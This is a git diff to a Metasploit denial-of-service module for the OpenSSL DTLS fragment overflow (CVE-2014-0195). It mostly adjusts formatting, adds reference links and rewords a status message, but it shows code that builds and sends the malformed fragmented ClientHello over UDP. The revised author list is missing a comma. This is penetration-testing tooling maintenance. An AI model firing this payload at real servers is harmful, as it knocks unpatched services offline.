diff --git a/modules/auxiliary/dos/ssl/dtls_fragment_overflow.rb b/modules/auxiliary/dos/ssl/dtls_fragment_overflow.rb index 93492c5959..7143ea92e8 100644 --- a/modules/auxiliary/dos/ssl/dtls_fragment_overflow.rb +++ b/modules/auxiliary/dos/ssl/dtls_fragment_overflow.rb @@ -12,17 +12,17 @@ class Metasploit3 < Msf::Auxiliary def initialize(info = {}) super(update_info(info, - 'Name' => 'OpenSSL DTLS Fragment Buffer Overflow DoS', - 'Description' => %q{ + 'Name' => 'OpenSSL DTLS Fragment Buffer Overflow DoS', + 'Description' => %q{ This module performs a Denial of Service Attack against Datagram TLS in OpenSSL before 0.9.8za, 1.0.0 before 1.0.0m, and 1.0.1 before 1.0.1h. This occurs when a DTLS ClientHello message has multiple fragments and the fragment lengths of later fragments are larger than that of the first, a buffer overflow occurs, causing a DoS. }, - 'Author' => + 'Author' => [ - 'Juri Aedla', # Vulnerability discovery + 'Juri Aedla ' # Vulnerability discovery 'Jon Hart ' # Metasploit module ], 'License' => MSF_LICENSE, @@ -30,7 +30,9 @@ class Metasploit3 < Msf::Auxiliary [ ['CVE', '2014-0195'], ['ZDI', '14-173'], - ['BID', '67900'] + ['BID', '67900'], + ['URL', 'http://h30499.www3.hp.com/t5/HP-Security-Research-Blog/ZDI-14-173-CVE-2014-0195-OpenSSL-DTLS-Fragment-Out-of-Bounds/ba-p/6501002'], + ['URL', 'http://h30499.www3.hp.com/t5/HP-Security-Research-Blog/Once-Bled-Twice-Shy-OpenSSL-CVE-2014-0195/ba-p/6501048'] ], 'DisclosureDate' => 'Jun 05 2014')) @@ -73,7 +75,7 @@ class Metasploit3 < Msf::Auxiliary fragments << build_tls_fragment(1, 1234, 0, 0, 123, Rex::Text.rand_text_alpha(1234)) message = build_tls_message(22, datastore['VERSION'], 0, 0, fragments) connect_udp - print_status("Sending fragmented DTLS client hello packet to #{rhost}:#{rport}") + print_status("#{rhost}:#{rport} - Sending fragmented DTLS client hello packet") udp_sock.put(message) disconnect_udp end